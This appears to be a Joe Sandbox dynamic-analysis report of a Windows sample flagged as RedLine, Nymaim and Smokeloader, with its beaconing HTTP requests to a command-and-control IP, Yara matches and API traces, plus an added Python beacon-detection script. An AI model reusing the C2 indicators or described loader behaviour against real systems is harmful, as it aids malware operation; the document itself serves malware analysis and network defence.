RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
RT_GROUP_ICON | 0x4af94c | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x4af94c | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_VERSION | 0x4af97c | 0x254 | data | | | 0.5436241610738255
RT_MANIFEST | 0x4afbd0 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 16:41:56.633661032 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49722 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 16:42:21.693939924 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.5 | 49778 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:42:46.763020039 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.5 | 49805 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:42:57.933007956 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.5 | 49860 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:43:23.009505033 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.5 | 49915 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:43:48.093626976 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.5 | 49971 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:44:13.196744919 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.5 | 49983 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:44:38.264117002 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.5 | 49984 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:45:03.358014107 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.5 | 49985 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:45:28.437895060 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.5 | 49986 | 185.156.72.65 | 80 | 7268 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 16:45:49.369179010 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


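The eleven sessions above are the same request, `GET /add?substr=mixtwo&s=three&sub=nosub` with `User-Agent: 1`, sent to 185.156.72.65 roughly every 25 seconds from the same PID. The script below is an added example and is not part of the Joe Sandbox report or of any Joe Security tooling: it re-parses those requests (timestamps and headers copied from the sessions above and embedded as constructed sample input) and flags the beacon on two signals a network defender can act on, a User-Agent no browser or common HTTP library sends and a near-constant inter-request interval. The thresholds (`min_hits`, `max_jitter`) and the User-Agent heuristic are assumptions for the example, not values from the report.

```python
"""Beacon detection over the HTTP sessions captured in the report above.

Added example, not part of the Joe Sandbox report. The request bytes and
timestamps are copied from the report's HTTP sessions and embedded here as
constructed sample input so the script runs offline.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample input: the request line and headers were identical in
# every captured session; only the timestamp (CET) and source port differed.
REQUEST = (
    "GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1\r\n"
    "Accept: text/html, application/xml;q=0.9, */*;q=0.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    "User-Agent: 1\r\n"
    "Host: 185.156.72.65\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
CAPTURED = [(ts, "185.156.72.65", REQUEST) for ts in (
    "2024-11-30 16:41:56.633", "2024-11-30 16:42:21.693",
    "2024-11-30 16:42:46.763", "2024-11-30 16:42:57.933",
    "2024-11-30 16:43:23.009", "2024-11-30 16:43:48.093",
    "2024-11-30 16:44:13.196", "2024-11-30 16:44:38.264",
    "2024-11-30 16:45:03.358", "2024-11-30 16:45:28.437",
    "2024-11-30 16:45:49.369",
)]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target and a header dict
    (header names lower-cased, since HTTP header names are case-insensitive)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def suspicious_user_agent(ua: str) -> bool:
    """Heuristic (assumption for this example): browsers and mainstream HTTP
    libraries send at least one product/version token such as 'Mozilla/5.0';
    a very short value or one without a slash is treated as suspicious."""
    return "/" not in ua or len(ua) < 8


def find_beacons(records, min_hits=5, max_jitter=0.1):
    """Group requests by (destination, target, User-Agent), measure the gaps
    between consecutive requests and report groups whose gap is stable.

    Jitter is MAD/median of the gaps rather than standard deviation, so the
    two shorter gaps in the capture (11 s and 21 s) do not mask an otherwise
    regular 25 s beacon. Thresholds are assumptions for the example.
    """
    groups = defaultdict(list)
    for ts, dst, raw in records:
        req = parse_request(raw)
        key = (dst, req["target"], req["headers"].get("user-agent", ""))
        groups[key].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"))

    findings = []
    for (dst, target, ua), stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        med = median(gaps)
        jitter = median(abs(g - med) for g in gaps) / med if med else 0.0
        if jitter <= max_jitter:
            findings.append({
                "dst": dst,
                "target": target,
                "user_agent": ua,
                "hits": len(stamps),
                "period_s": round(med, 2),
                "jitter": round(jitter, 4),
                "weak_user_agent": suspicious_user_agent(ua),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(CAPTURED):
        print(finding)
```

On the captured sessions this reports one group: 11 hits to 185.156.72.65 for the same target, a median period of about 25 s with negligible jitter, and a flagged User-Agent. Either signal alone is a reasonable proxy or IDS rule (match the `/add?substr=` target together with the one-character User-Agent); the periodicity check is what survives once the operator rotates the path and header values.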
                    Target ID:0
                    Start time:10:41:52
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'008'064 bytes
                    MD5 hash:24FD69187BD9CB0BFBAE4C051DB9E658
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:false

                      Execution Graph

                      Execution Coverage:1.7%
                      Dynamic/Decrypted Code Coverage:5.3%
                      Signature Coverage:3.6%
                      Total number of Nodes:561
                      Total number of Limit Nodes:5
                      execution_graph (rendered in the report as an interactive node/edge graph; the serialized node and edge list is not reproduced here). API calls that appear as graph nodes, grouped by the address range they execute from:
                      • 0x0040xxxx (the 0x400000 image, MSVC CRT plus application code): IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW, GetSystemTimeAsFileTime, GetLastError, SetLastError, Sleep, RaiseException, RtlAllocateHeap, EnterCriticalSection, LeaveCriticalSection, RtlWakeAllConditionVariable, SetEvent, ResetEvent
                      • 0x0479xxxx (outside the image; same region as the RedLineStealer Yara match above): CreateToolhelp32Snapshot, Module32First, VirtualAlloc
                      • 0x0494xxxx (outside the image; same region as the Nymaim and Smokeloader Yara matches above): SetErrorMode (two consecutive calls), GetPEB, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                      • 0x005fdxxx: RegOpenKeyA (two calls), GetNativeSystemInfo, LoadLibraryA
                      • 0x006faf2c: VirtualProtect
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,BBD3FB9F,75920F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0479848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047984AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: e2566512e86f89ba90c22dec4e3e596ea5bd6550231dc70b7a4f7e6d16353d7c
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 25F06236110711ABEB203FF5AC8CA6E76E8AF4A625F110528E642952D0DB74FC4546A2

                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • GET, xrefs: 004020E7
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • http://, xrefs: 00401EF4, 004021D3
                      • text, xrefs: 00401B8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0494024D
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: ddbb7b09f19d5ec3bf19675422a8a6ba8997af91244f1046b3b4109762b90cf0
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: B4527A74A01229DFDB64CF58C984BACBBB5BF49304F1480E9E54DAB351DB30AA85DF14

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                      APIs
